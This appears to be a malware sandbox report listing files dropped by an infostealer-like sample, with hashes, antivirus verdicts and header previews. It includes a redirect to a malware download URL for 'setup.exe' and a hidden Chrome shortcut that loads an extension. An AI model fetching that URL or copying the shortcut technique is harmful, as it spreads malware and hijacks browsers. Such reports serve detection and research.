QORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1026
                                          Entropy (8bit):4.698999446679606
                                          Encrypted:false
                                          SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                          MD5:73351F70BFEF33BEEA9E1CC192801D02
                                          SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                          SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                          SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                          Malicious:false
                                          Preview:UNKRLCVOHVAXPHOHAZYDIMBTYYPLYBYVUEQLGGJJCFCITCEMGOMMPTCXLGLYUZHZWMTUNUOFUUYAUDMSGBWJKAMIFUAYTDIKVYQPGYQSIZTANWSUNZDHBRNONSOUWVUJZFBPOZIMZOUPVAYJKSJULUHYRYUUOLYWEWFCYAZHMJKHXUZLTHEXFDNRXIUQOZHGGMDFHSXAJKHPBRPJJKVVXGMDIMEMMFXEOBQJSMYSSMPVSVUNJLJSSMEFHHLFEVPWZDDEIKQGOJPOJWTWMNPIEQXWXOBLNLDRNRUGDUXCMTURFAWMSSYAENGRWRBIJOYJNUMDYXNDETRQMYAMGJYZKZQPFPCONTLPPRLYMQJPIWCAXNOLGZOTNQEWQGBVSNORDVIXIUJAENWBXHSXSDNAMBAXUDBRCRHHYFJQLZEAGFZJUFMBIUBABNXVYITYPKRJUMGDPPABWBKNLHDKPLRUIRQXXKLFZAHHOQZHNTUNORTHIPKRZRDGRVPKIZRHYAGOVNDISDQRFXONCHILLZJTGXRZPEIPHKZXDBODDSUZIKNUVTNMZGVZQILJHRYJYZKDBLCLJFWSXRREYFFMEXBICHNCCTBTTTTZZVMSHPBKJMXPXFJNIDQFSJDMCXXUZPFVBFVKYCVFVQFUVOJWWIUNBICQVZGOZZVDJKKZTGDLWXADCBHYGUDWYWTYVYOOICLDGZXJHSTPFGQBMRCCCBJSXCPVVBKRNYTLTAOWPNJFKXUXQORRVHCHMSRAHQHFDEMZUFOFJOQFXHQBLWKNHXKEBLUJMQCFCSTBVXKUUPPXZNEWBUZPPVJFCDLXJEGEZSQSHHBNUCTRMEDMGPNZBHGEXVTWWZFELEFQQWXGHSVDMBAGZANSOHWAGHWRFCVNRSBOOZFJQONOYPNXBMHJINMGSGLMUSTAOMZXKOIHFYYSJWELBRBKMJUVQKVVFUFLDZKJVPCATVIHCISAYNPTMBEUQYJRYFUSBKOSITLVDUTJ
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):685392
                                          Entropy (8bit):6.872871740790978
                                          Encrypted:false
                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: jE4zclRJU2.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse
                                          • Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse
                                          • Filename: BI6oo9z4In.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: btCbrSS2Je.exe, Detection: malicious, Browse
                                          • Filename: 7urUz64I0Y.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):608080
                                          Entropy (8bit):6.833616094889818
                                          Encrypted:false
                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):450024
                                          Entropy (8bit):6.673992339875127
                                          Encrypted:false
                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):2046288
                                          Entropy (8bit):6.787733948558952
                                          Encrypted:false
                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exe
                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                          Category:dropped
                                          Size (bytes):11403264
                                          Entropy (8bit):7.976262170621303
                                          Encrypted:false
                                          SSDEEP:196608:SYvZvPF60956XHt6+YF+ELzL2Zjbn2YH0oD6DGcCwHbGkG:3Fcw5kHo5F+E+j7260oOYc
                                          MD5:D43AC79ABE604CAFFEFE6313617079A3
                                          SHA1:B3587D3FA524761B207F812E11DD807062892335
                                          SHA-256:8B750884259DD004300A84505BE782D05FCA2E487A66484765A4A1E357B7C399
                                          SHA-512:BB22C73ED01FF97B73FEB68AE2611B70EF002D1829035F58A4BA84C5A217DB368AAE8BDC02CDEC59C1121922A207C662AA5F0A93377537DA42657DD787587082
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Avira, Detection: 100%
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 92%
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...._3f..........#..........,......`..........@.......................................... .................................................06..d.......X,...Y...*..............................................(....W..8...............h............................text....~.......................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0....,......................... ..`.text1..8...........................@....text2............................`..h.rsrc...X,.........................@..@........................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):257872
                                          Entropy (8bit):6.727482641240852
                                          Encrypted:false
                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):80880
                                          Entropy (8bit):6.920480786566406
                                          Encrypted:false
                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                          MD5:A37EE36B536409056A86F50E67777DD7
                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Reputation:unknown
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:41 2023, mtime=Wed Oct 4 13:16:57 2023, atime=Wed Sep 27 04:28:27 2023, length=3242272, window=hide
                                          Category:dropped
                                          Size (bytes):2210
                                          Entropy (8bit):3.5001704487325553
                                          Encrypted:false
                                          SSDEEP:48:8SWl2dfTXdARYrnvPdAKRkdA0qOJq87dAKRFdAKRE:8SWlO70
                                          MD5:3E08595D0880FD65B5D1719EECA76D0C
                                          SHA1:DDE30489879C3FD1AD941662C8C03572DA0B42C0
                                          SHA-256:A7EEFF977C6CD5A82453344CE002485FBA3CD3BB2126E6CE6406E11FD10284CE
                                          SHA-512:82137854698638D105F9B618AFB99BB3FAF942ACD4F38D42B01DB685CDBB530352A92D7FACFA7A8B3FC4F8AC32734844D9212D11B9EE7E6B0036CFFFDB449848
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ......,....&.;o.......q.... y1.....................#....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IDW.r....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDWUl....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDWUl....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDWUl..........................."&.A.p.p.l.i.c.a.t.i.o.n.....`.2. y1.;W.+ .chrome.exe..F......CW.VDW.r..........................,.6.c.h.r.o.m.e...e.x.e.......d...............-.......c............F.......C:\Program Files\Google\Chrome\Application\chrome.exe....A.c.c.e.s.s. .t.h.e. .I.n.t.e.r.n.e.t.;.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.@. .-.-.l.o.a.d.-.e.x.t.e.n.s
                                          Process:C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):522
                                          Entropy (8bit):5.358731107079437
                                          Encrypted:false
                                          SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLU84qpE4KlKDE4KhKiKhk
                                          MD5:93E4C46884CB6EE7CDCC4AACE78CDFAC
                                          SHA1:29B12D9409BA9AFE4C949F02F7D232233C0B5228
                                          SHA-256:2690023A62F22AB7B27B09351205BA31173B50B77ACA89A5759EDF29A1FB17F7
                                          SHA-512:E9C3E2FCEE4E13F7776665295A4F6085002913E011BEEF32C8E7065140937DDE1963182B547CC75110BF32AE5130A6686D5862076D5FFED9241F183B9217FA4D
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):1119
                                          Entropy (8bit):5.345080863654519
                                          Encrypted:false
                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                          MD5:88593431AEF401417595E7A00FE86E5F
                                          SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                          SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                          SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):3274
                                          Entropy (8bit):5.3318368586986695
                                          Encrypted:false
                                          SSDEEP:96:Pq5qHwCYqh3oPtI6eqzxP0aymRLKTqdqlq7qqjqcEZ5D:Pq5qHwCYqh3qtI6eqzxP0at9KTqdqlqY
                                          MD5:0B2E58EF6402AD69025B36C36D16B67F
                                          SHA1:5ECC642327EF5E6A54B7918A4BD7B46A512BF926
                                          SHA-256:4B0FB8EECEAD6C835CED9E06F47D9021C2BCDB196F2D60A96FEE09391752C2D7
                                          SHA-512:1464106CEC5E264F8CEA7B7FF03C887DA5192A976FBC9369FC60A480A7B9DB0ED1956EFCE6FFAD2E40A790BD51FD27BB037256964BC7B4B2DA6D4D5C6B267FA1
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):363524
                                          Entropy (8bit):7.57211933250563
                                          Encrypted:false
                                          SSDEEP:6144:OP0wA09bNrhIlLyTN9QVt7W+zjdhdoReVR0xzhPpHYZ7WPU9KwRTDKjgtv:OLA09dXzcpWMjdzogj0xLHYCU9KwBrtv
                                          MD5:0B295AE70668506F7E057D608D8A231C
                                          SHA1:813DDDA46D63534C49289B2CB02865C5A0303B5C
                                          SHA-256:CD4A762645C71146654F689B3F4A3CB22B140BD2453D9F58EE82725160F80C36
                                          SHA-512:A582CFF354A1F125C0604E78D764E14CC868A0A73B203E947A22CE640BE564D4DDA94798CD2FB976296E4AF02A6F935020347B535BC2324F861C400F74E504C4
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..fUXO......................................................................4..Y.4A}|f5egzrgtx5vt{{za5wp5g`{5|{5QZF5xzqp;...1.......\.b:...i...i...i..h...i..h...i..h...i..h...i...iC..i.y.h...i.y.h...i.y.h...i.z.h...i.z.h...iG|v}...i................EP..Y....Es...............2.............R......................................................................................}L..=...............................Y....*...............................+..............................................;apma..............................5..u;wff................................5..u;gqtat..................................;qtat....T...e...!...+..................;gpyzv..Y............g.................W............................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):470020
                                          Entropy (8bit):7.7103899123566615
                                          Encrypted:false
                                          SSDEEP:6144:gJ0NRS7acUF7Jb1lMnUat54mNJBx7gn9EBknA/mzIngIlMjA0wism0J14:g/7anbIUaX3tRgni+iPgl80w1n4
                                          MD5:D97C25F6FF6EC815829DA90414B9E6CC
                                          SHA1:6979D0C2C3B973C3AEBDFAA0E9EC3C405D985773
                                          SHA-256:71E9AA981213F8E39F2080BEA44CFFB22AF1FB17D85DD9180F65C5FFE3BEA50F
                                          SHA-512:D4E2B82E4FC244C2174483D50C421862F969D69FFC65C668C16E4C4BA159ED7594CB9ADD60D368368EB4E57706C7F69421A2F310336AA2FF8E5197CB2493B758
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..fUXO......................................................................4..Y.4A}|f5egzrgtx5vt{{za5wp5g`{5|{5QZF5xzqp;...1.......\.b:...i...i...i..h...i..h...i..h...i..h...i...iC..i.y.h...i.y.h...i.y.h...i.z.h...i.z.h...iG|v}...i................EP..Y....Es...............2.............R......................................................................................}L..=............................u..Y....*...............................+..............................................;apma..............................5..u;wff................................5..u;gqtat..................................;qtat...y....e.......+..................;gpyzv..Y....u.........................W............................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):744964
                                          Entropy (8bit):7.822972859211005
                                          Encrypted:false
                                          SSDEEP:12288:OVCN4yKMZKx0P8YmCaytUe7q1jOIVudMir1TZKdOQtuFUlRLMdCDjMqnzmfkGO:Og4ynZcYmCx2yq1jdxitEptu2lyUjMKb
                                          MD5:46F8D5A6DBC6F4D9CA7F1712B7C326B8
                                          SHA1:E973D113051193C56DA2B14CCBDB36CAC6CD2499
                                          SHA-256:F68404DAB2F17E48765A872FFEFFA4CE6D40F8C281131FF4F859AC608EBD863D
                                          SHA-512:08D0A437AEB2CEF3FC02B7E606C75A9C49A218547E38ADA1DE8C5EB9178540F54F79242EF35DC6312F98BB2E98698B0898926AFE60694D4D7CF9364BB194CC21
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..fUXO......................................................................4..Y.4A}|f5egzrgtx5vt{{za5wp5g`{5|{5QZF5xzqp;...1........]...<..<..<..n..<..n$.;<..n%.<..DW.<..<...<....!.<..n..<......<..G|v}.<..........................EP..Y...unHp............................c(.......5.................................................................................)....................................................................m...............5..E...........................;apma...6...........................5..u;gqtat..G~...5...y......................;qtat...........-...i..................;gfgv...............................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:HTML document, ASCII text
                                          Category:dropped
                                          Size (bytes):327
                                          Entropy (8bit):5.319668710078847
                                          Encrypted:false
                                          SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPXyLV4SiKRzeZAUyBFEcXaoD:J0+ox0RJWWPC5zlwAULma+
                                          MD5:F101A8E9EF053725710718F476A12140
                                          SHA1:5EA293E77279620D3E64B61B07DA74226846E537
                                          SHA-256:B9FAF7DE0991054C690B9941913845E4976DE96A05997E5A434F5FB346771715
                                          SHA-512:8CD8D280009F3A314AF04083456D76298D0132EBF9C5E439AC3E3242547740A3E68D8722B32A65F335545359238ADAFAB23342638F1C681111047AF6CE6D12C3
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://f.123654987.xyz/525403/setup.exe">here</a>.</p>.<hr>.<address>Apache/2.4.55 (Unix) Server at monoblocked.com Port 80</address>.</body></html>.
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):5154292
                                          Entropy (8bit):7.171492934819912
                                          Encrypted:false
                                          SSDEEP:49152:mwdNeU0wrWwvHNGGnZVx5MpE8qpwziOW2VTJGTS6nYa8+/PwesQS1D+A17kQps2X:V3H5Wwv7ApEPwzdWrYE7sQQ7s2jA33Y
                                          MD5:2B78061725EF2B3E9B4522A8710A450B
                                          SHA1:B8688C8AD5B133A563F502390C2CD8ADF36B643E
                                          SHA-256:A8DC72BC6C887E75B762CD8E36A5A6BA8F8224B0345427652BA9B7D1A76A5C0C
                                          SHA-512:57E86F813E01DF5B98C16F4BB02467D919F1A36EC2659F2B7CEFCC065F1E648D6D70E1314000E935527E1CDB260A3648B5D9017B4F6C3B7C604E9E88707AC253
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:..fUXO......................................................................4..Y.4A}|f5egzrgtx5vt{{za5wp5g`{5|{5QZF5xzqp;...1.......EP..Y...-.................E..._..Y........^..5...5^......5........................[......RZ.....................................E.^.^....5^..\...........-[..x....[......................................................5...............5..]...........;apma....._..5...._.................5..u;gfgv....\...5^.._...._.................;gpyzv........[......#[................W..................^.....]........(..A...........}L..n.-.........................................#>.=..R_=....?../>.=x..$.=....?.C>.=K5]r..=....-.....?..W>.=#.LAk.......?...#>.=<5fxk....?...%..........>.=WAq:5........-........P....U...&...-....f.........-....?f.........-?...f.........-....fU........5...../....3-....f.........-......%..3.......>.=i.I,.k....z......-....-....-......?...%..>.......>.=.g%~-....-....-.....k....z......-......?..%..3.......>.=1G./.k....z......-....-....-......?...%..3...
                                          Process:C:\Users\user\Desktop\CHA0VZiz8y.exe
                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):5784496
                                          Entropy (8bit):7.99910944014302
                                          Encrypted:true
                                          SSDEEP:98304:mekOFPgruSYB8N5sZiRqR0RVfeD8edrD7SOCWMXhcxVWpUicGPlheuw3cclMjl:Hs6+NKmV2D8el73CcXqhPPlheN3cclMR
                                          MD5:8B7B381CF7D4F577009F99FCE7E5FD39
                                          SHA1:532A3AA24F4A0EEAEB3178BA1E3B0D5C03919196
                                          SHA-256:D6E1F4954E9F21CA9B289BE4CFA7B330A944B3618E96C3C8032C531F02E2E644
                                          SHA-512:FC04EFA1A0EB63B8CA249519DC54F8897DE010F83A38BA225E02B81BEFB6CF5AEF58BBC6883B664DCA666E1A0B79A47C4CAC3D2B35348F3FEBDB48CE4C3EA48C
                                          Malicious:true
                                          Reputation:unknown
